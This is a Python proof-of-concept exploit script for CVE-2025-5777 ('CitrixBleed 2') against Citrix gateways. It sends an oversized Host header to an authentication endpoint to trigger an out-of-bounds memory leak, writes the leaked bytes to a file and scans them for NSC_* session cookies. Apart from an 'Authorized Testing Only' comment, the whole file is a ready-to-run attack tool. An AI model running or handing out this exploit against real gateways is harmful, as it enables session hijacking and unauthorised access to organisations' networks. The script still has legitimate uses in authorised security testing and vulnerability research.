#!/usr/bin/env python3
# CVE-2025-5777 CitrixBleed 2 - OOB Memory Leak PoC
# ⚠️ Authorized Testing Only

import requests
import sys
import re
import urllib3

urllib3.disable_warnings()

def leak_memory(target_url):
    url = target_url.rstrip("/") + "/nf/auth/startwebview.do"
    headers = {
        "Host": "A" * 0x6000  # 24KB，超过 0x1800 缓冲区
    }

    print(f"[+] Sending OOB Host header to {url}")
    try:
        r = requests.get(url, headers=headers, verify=False, timeout=10)
    except Exception as e:
        print(f"[-] Request failed: {e}")
        return

    print(f"[+] Response received: {len(r.content)} bytes")

    with open("leak_output.bin", "wb") as f:
        f.write(r.content)

    hits = re.findall(rb"(NSC_[A-Z]+=[^;\r\n ]+)", r.content)
    if hits:
        print("[+] Potential session cookies found:")
        for hit in hits:
            print(f"    - {hit.decode(errors='ignore')}")
    else:
        print("[-] No NSC_* cookies found. Try again or validate target.")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} https://target-gateway")
        sys.exit(1)

    leak_memory(sys.argv[1])